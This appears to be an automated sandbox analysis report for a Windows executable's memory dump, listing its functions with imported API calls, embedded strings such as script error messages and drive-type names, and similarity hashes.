DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009C20D3
KillTimer.USER32(-00000001,?,?,?,?,009C16CB,00000000,?,?,009C1AE2,?,?), ref: 009C216E
DestroyAcceleratorTable.USER32 ref: 009FBEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009C16CB,00000000,?,?,009C1AE2,?,?), ref: 009FBF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009C16CB,00000000,?,?,009C1AE2,?,?), ref: 009FBF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009C16CB,00000000,?,?,009C1AE2,?,?), ref: 009FBF5A
DeleteObject.GDI32(00000000), ref: 009FBF6C

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: fadc2831e2a27cb3e4a965c9ab253de8506568262270e2ac4abafbe93866cca7
Instruction ID: b23c297c1fc948b0a5454ef1a16d1ae214f7e5391a8fb5da2a3b39a7edbeaaf6
Opcode Fuzzy Hash: fadc2831e2a27cb3e4a965c9ab253de8506568262270e2ac4abafbe93866cca7
Instruction Fuzzy Hash: 2A61BC39904604DFDB35EF54CD48B39BBF5FB81316F14882DE28686960C776A892DF82

Uniqueness

Uniqueness Score: -1.00%

Function 009C21A5, Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 009C25DB: GetWindowLongW.USER32 ref: 009C25EC

GetSysColor.USER32(0000000F), ref: 009C21D3

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 9d8fd83d7a4e592e49b500897babf8f05f97a1a67a2e313345c8df099aed2bf2
Instruction ID: 9d66920e57774ddb930717840e0bf17a4300aa1bf81f5d6d258d1ab148eb2dbc
Opcode Fuzzy Hash: 9d8fd83d7a4e592e49b500897babf8f05f97a1a67a2e313345c8df099aed2bf2
Instruction Fuzzy Hash: FA41B535504144AEEB259FA8EC48FB93B69EB47331F144369FA75890E2C7324C42DB22

Uniqueness

Uniqueness Score: -1.00%

Function 00A1AA64, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 00A1AAA5
SendMessageTimeoutW.USER32 ref: 00A1ABAE
GetClassNameW.USER32 ref: 00A1AC21
GetDlgCtrlID.USER32(?), ref: 00A1AC73
GetWindowRect.USER32 ref: 00A1ACA9
GetParent.USER32(?), ref: 00A1ACC7
ScreenToClient.USER32 ref: 00A1ACCE
GetClassNameW.USER32 ref: 00A1AD48
GetWindowTextW.USER32 ref: 00A1AD82

Strings

%s%u, xrefs: 00A1AB40

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
String ID: %s%u
API String ID: 1412819556-679674701
Opcode ID: 0b066c1abb9424cebb87c8581ebe9c255cd056fdeb6b9a4472ad3ca74f0efd3f
Instruction ID: 660681da072656585b3b0a164c189e7e2db1ec2a9d7694eae256b598130a8b70
Opcode Fuzzy Hash: 0b066c1abb9424cebb87c8581ebe9c255cd056fdeb6b9a4472ad3ca74f0efd3f
Instruction Fuzzy Hash: 99A10C71205742AFDB15DF64C884BEAF7E8FF64345F008629F999C2190DB30E985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A1B397, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 00A1B3DB
GetWindowTextW.USER32 ref: 00A1B414
CharUpperBuffW.USER32(?,00000000), ref: 00A1B431
GetClassNameW.USER32 ref: 00A1B498
GetWindowTextW.USER32 ref: 00A1B4CF
GetClassNameW.USER32 ref: 00A1B518
GetClassNameW.USER32 ref: 00A1B550
GetWindowRect.USER32 ref: 00A1B5B9

Strings

ThumbnailClass, xrefs: 00A1B4A3, 00A1B523
@, xrefs: 00A1B3BC

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper
String ID: @$ThumbnailClass
API String ID: 3725905772-1539354611
Opcode ID: 8c000da6cc8ef167b67a679f608dfdd86fa496910f5da7bd6be99732a6b56904
Instruction ID: 13abc65fb3ca87ff582436f3c1dc2d5bfbc82529b0fbcd2290031f9d06e44156
Opcode Fuzzy Hash: 8c000da6cc8ef167b67a679f608dfdd86fa496910f5da7bd6be99732a6b56904
Instruction Fuzzy Hash: D481CE710183459FDB05DF11C985FAABBE8EF84314F08856AFD998A0A2DB34DD85CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00A1FDBA, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 142windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,?,00000000,00000001,?,009FE452,?,0000138C,?,00000001,?,?,?,00000001), ref: 00A1FDEF
LoadStringW.USER32(00000000,?,009FE452,?), ref: 00A1FDF8
GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,009FE452,?,0000138C,?,00000001,?,?,?,00000001,?), ref: 00A1FE1A
LoadStringW.USER32(00000000,?,009FE452,?), ref: 00A1FE1D
MessageBoxW.USER32(00000000,00000004,?,00011010), ref: 00A1FF3E

Strings

Error: , xrefs: 00A1FEF5
Line %d (File "%s"):, xrefs: 00A1FE67
%s (%d) : ==> %s: %s %s, xrefs: 00A1FF22
^ ERROR, xrefs: 00A1FED3
Line %d:, xrefs: 00A1FE78

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLoadModuleString$Message
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 4072794657-2268648507
Opcode ID: cd031455a39782bd66b50550f6cc56f2a78f3924b0082d2128561da83388ab10
Instruction ID: 630b0a30df404ba55f2f94ad2fbf241fa80718f64c0c6380fc184b286c764d8d
Opcode Fuzzy Hash: cd031455a39782bd66b50550f6cc56f2a78f3924b0082d2128561da83388ab10
Instruction Fuzzy Hash: 28411872D04249AACB15FBE0DD86FEEB738AF95300F504069F505660A2EA716F49CF62

Uniqueness

Uniqueness Score: -1.00%

Function 00A17D24, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136registryshareCOMMON

Download Yara Rule

APIs

WNetAddConnection2W.MPR(?,?,00000001,00000000), ref: 00A17DE8
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A17E04
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00A17E20
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000001), ref: 00A17E4A
CLSIDFromString.OLE32(?,?), ref: 00A17E72
RegCloseKey.ADVAPI32(?), ref: 00A17E7D
RegCloseKey.ADVAPI32(?), ref: 00A17E82

Strings

\CLSID, xrefs: 00A17D6A
SOFTWARE\Classes\, xrefs: 00A17D54
\IPC$, xrefs: 00A17DCA

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 3030280669-22481851
Opcode ID: 00f8fdf52a1937430002d4f1c871f213404d3a686f9bf19e58ab10a41ddcf083
Instruction ID: 44cd3ceda8ec5c27e9aa26bc54834346fa9f76cdc431859a0ba4c871f765772c
Opcode Fuzzy Hash: 00f8fdf52a1937430002d4f1c871f213404d3a686f9bf19e58ab10a41ddcf083
Instruction Fuzzy Hash: A0410676C1422CAEDB11EBE4EC85EEEB778FF84750B04446AF505A60A1EB315E45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A4772A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,?,?,?,000000FF,000000FF,?,?,static,?,00000000,?), ref: 00A477CD
CreateCompatibleDC.GDI32 ref: 00A477D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00A477E7
SelectObject.GDI32(00000000,00000000), ref: 00A477EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 00A477FA
DeleteDC.GDI32(00000000), ref: 00A47803
GetWindowLongW.USER32 ref: 00A4780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001,?,?,?,?,000000FF,000000FF,?,?,static,?,00000000,?), ref: 00A47821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,?,00000000,?,?,?,?,?,?), ref: 00A4782D

Strings

static, xrefs: 00A47765

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: be7087f775e3e743a659ae0cd0caeef9c42f93cf3676554519cdccd8b10c2746
Instruction ID: 93b9e360ed28146575d14f3b0abb5302fa002ed3154663f587729045ffec6677
Opcode Fuzzy Hash: be7087f775e3e743a659ae0cd0caeef9c42f93cf3676554519cdccd8b10c2746
Instruction Fuzzy Hash: 9D318D39101154BFDF119FA4DC08FEF3B69FF8A325F110225FA15A50A0C7329862DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A2D7F8, Relevance: 16.8, APIs: 11, Instructions: 283comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A2D855
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A2D8E8
SHGetDesktopFolder.SHELL32(?), ref: 00A2D8FC
CoCreateInstance.OLE32(00A52D7C,00000000,00000001,00A7A89C,?), ref: 00A2D948
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A2D9B7
CoTaskMemFree.OLE32(?,?), ref: 00A2DA0F
SHBrowseForFolderW.SHELL32(?), ref: 00A2DA88
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A2DAAB
CoTaskMemFree.OLE32(00000000), ref: 00A2DAB2
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00A2DAE9
CoUninitialize.OLE32(00000001,00000000), ref: 00A2DAEB

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 96510d6a952016f017fd4dd783a321b5ecef36a94d3b2ece8d946b6cdf41d9d0
Instruction ID: 1938fe1103101250d5ebb1e1ca59764c23625ae2a0b04971064fdecc253588aa
Opcode Fuzzy Hash: 96510d6a952016f017fd4dd783a321b5ecef36a94d3b2ece8d946b6cdf41d9d0
Instruction Fuzzy Hash: 5BB11F75A00119AFDB04DFA8D888EAEBBF9FF89304B148469F409EB251DB30ED41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A3762D, Relevance: 16.7, APIs: 11, Instructions: 167windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00A376A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00A376AE
CreateCompatibleDC.GDI32(00000006), ref: 00A376BA
SelectObject.GDI32(00000000,00000006), ref: 00A376C7
StretchBlt.GDI32(?,00000000,00000000,00000007,?,00000006,?,?,00000007,?,00CC0020), ref: 00A3771B
GetDIBits.GDI32(?,00000006,?,?,?,00000028), ref: 00A37757
GetDIBits.GDI32(?,00000006,00000000,?,00000000,00000028,00000000), ref: 00A3777B
SelectObject.GDI32(?,?), ref: 00A37783
DeleteObject.GDI32(00000006), ref: 00A3778C
DeleteDC.GDI32(?), ref: 00A37793
ReleaseDC.USER32 ref: 00A3779E

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID:
API String ID: 2598888154-0
Opcode ID: dd21762bb02ed7ba42200a8a1d220a90d25f023da5eddad648e2d6c8a298d155
Instruction ID: ab07eb6eb7794c84e8eee5e212f13eab0b1e306a782b04aaa00b50a61b8b6d1c
Opcode Fuzzy Hash: dd21762bb02ed7ba42200a8a1d220a90d25f023da5eddad648e2d6c8a298d155
Instruction Fuzzy Hash: 125160B9904209EFDB25CFA8DC85EAFBBB9EF89710F10841DF54997210D731A841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A1710E, Relevance: 16.6, APIs: 11, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,00000000), ref: 00A17135
SafeArrayAllocData.OLEAUT32(00000000), ref: 00A1718E
VariantInit.OLEAUT32(?), ref: 00A171A0
SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 00A171C0
VariantCopy.OLEAUT32(00000000,?), ref: 00A17213
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00A17227
VariantClear.OLEAUT32(?), ref: 00A1723C
SafeArrayDestroyData.OLEAUT32(00000000), ref: 00A17249
SafeArrayDestroyDescriptor.OLEAUT32(00000000), ref: 00A17252
VariantClear.OLEAUT32(?), ref: 00A17264
SafeArrayDestroyDescriptor.OLEAUT32(00000000), ref: 00A1726F

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9cb11480198f602906d0ea94c4beae3e74fdff88cad1c7b78eaa7dd178737c22
Instruction ID: 7c74652f01e3077dfc0d3b999c416b3ae33b532bb8dc4d5e8e0944cf6cdff07a
Opcode Fuzzy Hash: 9cb11480198f602906d0ea94c4beae3e74fdff88cad1c7b78eaa7dd178737c22
Instruction Fuzzy Hash: B3415D79900119AFCB00DFA8DD48DEEBBB8FF49354F009069F555E7261CB31A986CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A386D0, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00A38718
CoUninitialize.OLE32 ref: 00A38723
CoCreateInstance.OLE32(?,00000000,00000017,00A52BEC,?), ref: 00A38783
IIDFromString.OLE32(?,?), ref: 00A387F6
VariantInit.OLEAUT32(?), ref: 00A38890
VariantClear.OLEAUT32(?), ref: 00A388F1

Strings

NULL Pointer assignment, xrefs: 00A387C8
Failed to create object, xrefs: 00A3878E, 00A38844
Invalid parameter, xrefs: 00A3880F

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 8990e126534518b73ec68d9f8363526bec711877e5b80e1a56d30b90cce18a91
Instruction ID: af13bef64165bbd720f42c0cd0d2eb9e826fdce0dd72182d9687719a3563f359
Opcode Fuzzy Hash: 8990e126534518b73ec68d9f8363526bec711877e5b80e1a56d30b90cce18a91
Instruction Fuzzy Hash: E361AC74608301AFD710DF64C949F6BBBE8AF89754F10481DF9859B291CB78ED48CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A246D6, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?,?,?,?,?,00A2CD8C), ref: 00A246E8
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?,?,?,?,?,00A2CD8C), ref: 00A2470E
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?,?,?,?,?,00A2CD8C), ref: 00A24784

Strings

DefaultLangCodepage, xrefs: 00A247E7
StringFileInfo\, xrefs: 00A24757
\VarFileInfo\Translation, xrefs: 00A2477C
%u.%u.%u.%u, xrefs: 00A24862
04090000, xrefs: 00A247BA

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$QuerySizeValue
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 2179348866-1459072770
Opcode ID: d32960f884c0db321a5371dbd50f4cdf523b446455b7d67a63de0c0246977690
Instruction ID: 70f1cce2b3ecc24cc2f575a13ad6f7279a4c9965235e546ceef707c52e8b002e
Opcode Fuzzy Hash: d32960f884c0db321a5371dbd50f4cdf523b446455b7d67a63de0c0246977690
Instruction Fuzzy Hash: 18412676904294BAEB02A7759C47FBF77BCEFC6310F004536F505A6082EB35AE0196B5

Uniqueness

Uniqueness Score: -1.00%

Function 00A2DE85, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A2DF47
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A2DF57
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A2DF63
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A2E000
SetCurrentDirectoryW.KERNEL32(?), ref: 00A2E014
SetCurrentDirectoryW.KERNEL32(?), ref: 00A2E046
SetCurrentDirectoryW.KERNEL32(?), ref: 00A2E067
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A2E0B2

Strings

*.*, xrefs: 00A2E06D

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 31eff1505846e2b3ae0b8dc16517c2648b01b63f37a5a403b94344703635a47d
Instruction ID: 2248d24f3e85bb7583854dd25c863b5f3d25d28c4cb428ea975b6b6f1c44fd09
Opcode Fuzzy Hash: 31eff1505846e2b3ae0b8dc16517c2648b01b63f37a5a403b94344703635a47d
Instruction Fuzzy Hash: 8B616A765083559FCB10EF68D844EAEB3E8FF89310F04892DF98987251DB71E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A2AB12, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00A4F910), ref: 00A2AB76
GetDriveTypeW.KERNEL32(00000061,00A7A620,00000061), ref: 00A2AC40

Strings

unknown, xrefs: 00A2AC01
cdrom, xrefs: 00A2AB92
network, xrefs: 00A2ABD4
all, xrefs: 00A2AB7C
ramdisk, xrefs: 00A2ABEA
removable, xrefs: 00A2ABA8
fixed, xrefs: 00A2ABBE

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2426244813-1000479233
Opcode ID: 14ce7501e840ca030382bbacfebea965adc93742f6acedaaf9f32a43cbc0cf70
Instruction ID: eb4413761f89bf2f0fccb69dfd802f03992ea973e504624e91c327722dc11793
Opcode Fuzzy Hash: 14ce7501e840ca030382bbacfebea965adc93742f6acedaaf9f32a43cbc0cf70
Instruction Fuzzy Hash: 72519831508351ABC714EF18D881FAEB7A5EFE4310F14882DF48A972A2DB31AD49CB53

Uniqueness

Uniqueness Score: -1.00%

Function 00A35A45, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00A35AA6
inet_addr.WSOCK32(?,?,?), ref: 00A35AEB
gethostbyname.WSOCK32(?), ref: 00A35AF7
IcmpCreateFile.IPHLPAPI ref: 00A35B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A35B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A35B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00A35C00
WSACleanup.WSOCK32 ref: 00A35C06

Strings

Ping, xrefs: 00A35B29

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: e10c50f08108ba410f9f71840d7329d27fdbe8b776b18c1f76da65cbd9a42563
Instruction ID: bcc353cf6c13af4d42e7b80d9e38fefe1ecf42c635e9240251bea7cfd57d3a28
Opcode Fuzzy Hash: e10c50f08108ba410f9f71840d7329d27fdbe8b776b18c1f76da65cbd9a42563
Instruction Fuzzy Hash: 4B517E35A047009FD710DF68CC49B2AB7E4EF85750F14892AF959DB2A1EB70E941CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A29EA3, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 154COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00A29EEA
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A29F0B

Strings

^ ERROR , xrefs: 00A29FB9
Error: , xrefs: 00A29FEC
"%s" (%d) : ==> %s:, xrefs: 00A2A03D
Line %d (File "%s"):, xrefs: 00A29F5E, 00A29F77
Incorrect parameters to object property !, xrefs: 00A29FC6
"%s" (%d) : ==> %s:%s%s, xrefs: 00A2A01F

Memory Dump Source

Source File: 00000000.00000002.514054572.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000000.00000002.514012355.00000000009C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514698882.0000000000A4F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514764914.0000000000A75000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.514785899.0000000000A7F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.514846054.0000000000A88000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 2948472770-3080491070
Opcode ID: 6007409cb4d892800645c6a528c91b68c6b5f0bffbb4ba31212f9a63954d7dc5
Instruction ID: a70a584472a5b0cf132d48df617dbc9d3505c06dcca089958fb201f6b6ed5770
Opcode Fuzzy Hash: 6007409cb4d892800645c6a528c91b68c6b5f0bffbb4ba31212f9a63954d7dc5
Instruction Fuzzy Hash: E8517D72D04219BBDB15EBE0DD86FEEB778AF54300F104169B505720A1EB312F99DB62

Uniqueness

Uniqueness Score: -1.00%

